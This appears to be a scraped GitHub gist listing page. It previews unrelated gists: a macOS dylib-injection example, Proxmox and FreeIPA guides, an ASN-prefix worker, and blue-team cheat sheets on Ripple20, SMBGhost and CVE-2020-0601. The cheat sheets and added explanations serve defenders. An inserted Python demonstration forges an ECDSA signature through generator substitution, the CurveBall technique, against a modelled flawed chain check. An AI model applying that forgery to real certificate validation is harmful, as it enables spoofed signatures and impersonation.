vogelfreiheit

vocaeq / inject.c
Last active March 14, 2023 20:12 — forked from knightsc/inject.c
An example of how to inject code to call dlopen and load a dylib into a remote Mach task. Tested on macOS 12.5 on an M1 Pro.
#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <mach/mach.h>
#include <mach/error.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
Juul / gpib_linux_82350.md
Last active October 14, 2022 02:23
Guide for setting up GPIB support in Linux for the HP/Agilent 82350 A and B PCI cards

This is a guide for getting the HP/Agilent 82350 A or B GPIB cards working on Linux.

There are other guides made by other people for a couple of other GPIB adapters here:

Unfortunately the mainline Linux kernel does not have any GPIB support. Even more unfortunate is that neither Ubuntu nor Debian appear to have packages for the kernel modules nor do any third-party apt repos appear to exist that are remotely up to date.

freeipa-proxmox.sh
# Setting up Proxmox with a certificate from FreeIPA.
# This assumes you've already joined the machine with ipa-client-install
# Get a ticket as someone that can issue certificates
kinit admin
cat <<EOF > /usr/local/sbin/set-ssl-permissions
#!/bin/bash
FILES=/etc/pve/nodes/proxmox/{pve-ssl.key,pve-ssl.pem}
SwitHak / 20200618-TLP-WHITE_Ripple20.md
Last active April 28, 2022 21:44
BlueTeam CheatSheet * Ripple20 * | Last updated: 2020-06-26 2121 UTC

Ripple20: a set of vulnerabilities in the Treck / KASAGO IP stacks

General

  • Ripple20 is the codename for a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
  • These vulnerabilities are inside an IP stack sold under two different names: Treck TCP/IP for the U.S. market and Kasago TCP/IP for the Asian market. These two stacks were bought and used under private label by several software companies; some known names are GHnetv2, Kwiknet and Quadnet.
  • These stacks were also integrated, sometimes with modifications, into several RTOSes (real-time operating systems).
  • Last, some of the vulnerabilities, depending on the device's operating system, configuration or location, can have a higher or lower CVSS score.
  • My advice is for companies to ask their suppliers whether they use one of these stacks and to assess the risk following their company risk policy.
  • This will not be an easy set of vulnerabilities to patch, sadly.
ajmassi / LXCBindMount.md
Last active March 16, 2023 15:15
Create a bind mount from a Proxmox host on an unprivileged lxc container

Proxmox Assign Bind Mount To Unprivileged Container

To give the LXC container full access to the Proxmox host directory, the host directory's group is set to the container's mapped subgid, and an ACL is used to grant the permissions.

Bind Mount dataset to LXC

Add the following line to /etc/pve/lxc/<CT_ID>.conf

mp0:/mount/point/on/host,mp=/mount/point/on/lxc

Create group on host

In the default Proxmox configuration, container ids are offset by 100000 on the host, so an unprivileged container's 4-digit gid appears on the host as the prefix "10" followed by the container gid (container gid 1000 is host gid 101000).
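The id mapping this step relies on, as an added example in Python that is not part of ajmassi's gist: it reads the lxc.idmap entries Proxmox writes for an unprivileged container, translates a container gid to the host gid it appears as (also for a custom map, not only the default 100000 offset the text describes), and emits the host-side commands the rest of the procedure needs. The container id 101, the paths, the group name and the custom idmap in the usage are assumptions for the demonstration.

```python
import shlex

# Proxmox default for an unprivileged container: ids 0-65535 in the container map to
# 100000-165535 on the host (lxc.idmap syntax: kind ct_start host_start count).
DEFAULT_IDMAP = ["lxc.idmap: u 0 100000 65536", "lxc.idmap: g 0 100000 65536"]


def parse_idmap(lines):
    """Parse lxc.idmap lines, with or without the 'lxc.idmap:' prefix."""
    entries = []
    for line in lines:
        body = line.split(":", 1)[1] if line.startswith("lxc.idmap") else line
        kind, ct_start, host_start, count = body.split()
        if kind not in ("u", "g"):
            raise ValueError(f"unknown idmap kind {kind!r}")
        entries.append((kind, int(ct_start), int(host_start), int(count)))
    return entries


def host_id(idmap, kind, ct_id):
    """Host uid/gid that container id ct_id (kind 'u' or 'g') is mapped to.

    Raises LookupError for ids outside every range: those are 'nobody' on the host,
    which is why the bind mount needs a host group the container can actually see.
    """
    for k, ct_start, host_start, count in parse_idmap(idmap):
        if k == kind and ct_start <= ct_id < ct_start + count:
            return host_start + (ct_id - ct_start)
    raise LookupError(f"{kind}id {ct_id} is not mapped into the host")


def bind_mount_commands(ct_id, host_path, ct_path, ct_gid, group, idmap=DEFAULT_IDMAP):
    """Host-side commands for the procedure: create the mapped group, hand it the
    directory, add an ACL (plus a default ACL so new files inherit it), attach the mount."""
    hgid = host_id(idmap, "g", ct_gid)
    hp, cp = shlex.quote(host_path), shlex.quote(ct_path)
    return [
        f"groupadd -g {hgid} {shlex.quote(group)}",
        f"chown -R :{hgid} {hp}",
        f"setfacl -R -m g:{hgid}:rwx {hp}",
        f"setfacl -R -d -m g:{hgid}:rwx {hp}",
        f"pct set {ct_id} -mp0 {hp},mp={cp}",
    ]


if __name__ == "__main__":
    # Constructed example: container 101, whose gid 1000 should own /tank/share.
    for cmd in bind_mount_commands(101, "/tank/share", "/mnt/share", 1000, "ctshare"):
        print(cmd)
```

The `pct set ... -mp0` line is equivalent to adding the `mp0:` entry to `/etc/pve/lxc/<CT_ID>.conf` by hand. The point of mapping a dedicated group rather than relaxing modes to world-writable is least privilege: root inside the unprivileged container is uid 100000 on the host, so a compromised container only reaches host files that are explicitly granted to its mapped ids.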

yvesh / proxmox-zfs-encryption.md
Last active March 12, 2023 15:36
Proxmox 6.1 ZFS native full disk (ZFS root) encryption.

Simple guide for full-disk encryption with Proxmox and ZFS native encryption

Install normally using the installer; after the setup, reboot into recovery mode (from the USB stick). Make sure to install in UEFI mode (you need systemd-boot).

If the USB stick's recovery mode is not working for you because of its older kernel, you can also use an Ubuntu 19.10 / 20.04 boot stick; ZFS support is enabled there out of the box.

Steps:

SwitHak / 20200312-TLP-WHITE_CVE-2020-0796.md
Last active February 21, 2023 11:19
BlueTeam CheatSheet * CVE-2020-0796 * SMBGhost | Last updated: 2020-03-18 1238 UTC

CVE-2020-0796 AKA SMBGhost

General

  • A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests.
  • An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.
  • To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.
  • The security update addresses the vulnerability by correcting how the SMBv3 protocol handles these specially crafted requests.
  • Vulnerability was discovered by Microsoft Platform Security Assurance & Vulnerability Research team.

Affected products:

ringbuffer.cpp
// -lstdc++ -std=c++17 -lpthread
// https://forums.mageia.org/en/viewtopic.php?f=5&t=13294
#include <iostream>
#include <iterator>
#include <list>
#include <sstream>
// https://github.com/yhirose/cpp-httplib
#include "httplib.h"
johannrichard / asn.js
Last active November 20, 2021 15:11
Serverless Worker Function for ASN prefix parsing for OPNsense and pfSense
/***
* Worker Function for ASN prefix parsing
* Will query the BigIP API for a given ASN and return a plain-text representation of the ASN prefixes
* (IP ranges) that can be used in either OPNsense or pfSense URL Tables (Firewall alias).
*
* See https://docs.opnsense.org/manual/aliases.html (OPNsense) and https://docs.netgate.com/pfsense/en/latest/firewall/aliases.html (pfSense) for details of their use.
*
* You can deploy this worker for example on the free tier of CloudFlare (Up to 100'000 requests a day) or
* any other serverless platform that supports JavaScript
*
SwitHak / 20200114-TLP-WHITE_CVE-2020-0601.md
Last active February 8, 2023 13:42
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency and announced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
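The parameter-substitution trick behind CVE-2020-0601, as an added example in Python that is not part of SwitHak's cheat sheet or of Microsoft's code: the flawed CryptoAPI path matched a certificate to a cached trusted root on the public key alone and then verified with whatever explicit elliptic-curve parameters the presented certificate carried. An attacker who picks any private key d' and sets the generator G' = d'^-1 * Q, where Q is the trusted root's public point, owns a key pair whose public key equals the root's. The model below reduces the certificate's explicit ECParameters to the generator (in a real certificate the prime, a, b and order are also present and are copied unchanged from P-256); the trusted private key, the attacker key, the nonce and the signed message are constructed values, and the two chain-check functions model the pre- and post-fix logic rather than reproduce crypt32.dll.

```python
import hashlib

# NIST P-256: y^2 = x^3 + A*x + B over GF(P); base point G has prime order N.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)


def ec_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (not constant-time; demonstration only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def hash_to_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(msg, priv, gen, k):
    """ECDSA with an explicit generator. k must be a fresh secret nonce in real use;
    the demo passes a fixed one so the result is repeatable."""
    r = ec_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (hash_to_int(msg) + r * priv) % N
    return (r, s)


def ecdsa_verify(msg, sig, pub, gen):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    pt = ec_add(ec_mul(hash_to_int(msg) * w % N, gen), ec_mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r


# Constructed trusted root: its private key is never available to the attacker.
TRUSTED_PRIV = 0x4c5f3a2e9d1b7c8e6f0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60
TRUSTED_PUB = ec_mul(TRUSTED_PRIV, G)  # Q = d * G, the point the root certificate publishes

# Attacker: choose any d', then set G' = d'^-1 * Q so that d' * G' == Q. A certificate
# carrying explicit parameters with generator G' and public key Q now has a known key.
ATTACKER_PRIV = 0x0badc0de0badc0de0badc0de0badc0de0badc0de0badc0de0badc0de0badc0de
FORGED_GEN = ec_mul(pow(ATTACKER_PRIV, -1, N), TRUSTED_PUB)


def chain_check_vulnerable(cert, trusted_pub, msg, sig):
    """Model of the flawed logic: the root is matched on its public key alone and the
    signature is verified with whatever curve parameters the presented cert carries."""
    return cert["pub"] == trusted_pub and ecdsa_verify(msg, sig, cert["pub"], cert["gen"])


def chain_check_fixed(cert, trusted_pub, msg, sig):
    """Fixed logic: the presented parameters must be the trusted root's own curve."""
    return (cert["pub"] == trusted_pub and cert["gen"] == G
            and ecdsa_verify(msg, sig, trusted_pub, G))


MESSAGE = b"constructed payload: a binary the attacker wants trusted"
NONCE = 0x5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a5a
FORGED_CERT = {"pub": TRUSTED_PUB, "gen": FORGED_GEN}
FORGED_SIG = ecdsa_sign(MESSAGE, ATTACKER_PRIV, FORGED_GEN, NONCE)

if __name__ == "__main__":
    print("d' * G' == Q:", ec_mul(ATTACKER_PRIV, FORGED_GEN) == TRUSTED_PUB)
    print("vulnerable check accepts forgery:",
          chain_check_vulnerable(FORGED_CERT, TRUSTED_PUB, MESSAGE, FORGED_SIG))
    print("fixed check accepts forgery:",
          chain_check_fixed(FORGED_CERT, TRUSTED_PUB, MESSAGE, FORGED_SIG))
```

For the blue team the takeaway matches the NSA guidance: a certificate that carries explicit curve parameters instead of a named-curve OID, especially one whose public key equals a trusted root's, is the artifact to hunt for; the fixed check refuses any parameters that are not the trusted curve's own before it ever runs the signature math.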